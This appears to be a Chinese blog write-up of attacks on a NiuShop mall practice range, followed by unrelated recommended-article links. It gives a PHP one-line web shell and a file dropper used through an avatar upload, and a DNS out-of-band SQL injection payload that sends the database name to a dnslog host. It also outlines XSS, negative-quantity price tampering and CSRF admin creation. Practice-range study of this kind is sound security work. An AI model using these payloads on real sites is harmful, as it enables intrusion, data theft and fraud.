niushop开源商城靶场漏洞

文件上传漏洞

先注册一个账号

来到个人信息修改个人头像

选择我们的马

#一句话(不想麻烦的选择一句话也可以)

<?php @eval($_POST["cmd"]);?>

#生成h.php文件

<?php

fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');

?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

SQL注入漏洞

我们查看后台寻找功能点发现有一个地方可以执行 sql 命令

我们输入一个 sql 语句

发现没有回显,这时我们可以考虑使用外带注入

(select load_file(concat('\\\\',(select (database())),'96toab.dnslog.cn.dnslog.cn\\abc')))

得到数据库的名字为 niushop_b2c

获取表名

XSS漏洞

后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作添加管理员链接

添加管理员用户

BP抓包;制作SCRF

复制下来制作链接

admin管理员在已登录的状态点击我们的链接

相关推荐
爱喝奶茶的企鹅3 小时前
Ethan独立开发产品日报 | 2025-04-27
人工智能·程序员·开源
说私域6 小时前
基于开源技术体系的品牌赛道力重构:AI智能名片与S2B2C商城小程序源码驱动的品类创新机制研究
人工智能·小程序·重构·开源·零售
正宗咸豆花7 小时前
开源提示词管理平台PromptMinder使用体验
人工智能·开源·prompt
FIT2CLOUD飞致云9 小时前
干货分享|MaxKB智能问数方案及步骤详解
人工智能·开源
NocoBase11 小时前
一家家具厂,如何用零代码搭建自己的 ERP ?
低代码·开源·资讯
灏瀚星空11 小时前
从基础到实战的量化交易全流程学习:1.2 金融市场基础
笔记·python·信息可视化·系统架构·开源
码码哈哈0.012 小时前
同样开源的自动化工作流工具n8n和Dify对比
运维·开源·自动化
说私域13 小时前
颠覆传统微商!开源AI智能名片链动2+1模式S2B2C商城小程序:重构社交电商的“降维打击”革命
人工智能·小程序·开源·零售
普普通通的一名码农13 小时前
电化学-论文分享-NanoStat: An open source, fully wireless potentiostat
笔记·开源
三花AI15 小时前
FramePackLoop:开源无缝循环视频生成工具
开源